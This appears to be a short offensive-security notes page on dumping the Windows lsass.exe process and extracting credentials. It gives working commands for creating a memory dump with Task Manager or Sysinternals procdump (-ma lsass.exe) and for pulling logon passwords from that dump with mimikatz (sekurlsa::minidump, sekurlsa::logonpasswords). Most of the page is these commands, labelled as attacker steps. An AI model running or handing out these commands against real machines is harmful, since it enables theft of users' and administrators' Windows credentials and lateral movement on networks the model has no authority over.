Skip to content

Dumping Lsass.exe to Disk and Extracting Credentials

Task Manager

Create a minidump of the lsass.exe using task manager must be running as administrator:

Swtich mimikatz context to the minidump:

{% code-tabs %} {% code-tabs-item title="attacker@mimikatz" %}

sekurlsa::minidump C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords
{% endcode-tabs-item %} {% endcode-tabs %}

Procdump

Procdump from sysinternal's could also be used to dump the process:

{% code-tabs %} {% code-tabs-item title="attacker@victim" %}

procdump.exe -accepteula -ma lsass.exe lsass.dmp
{% endcode-tabs-item %} {% endcode-tabs %}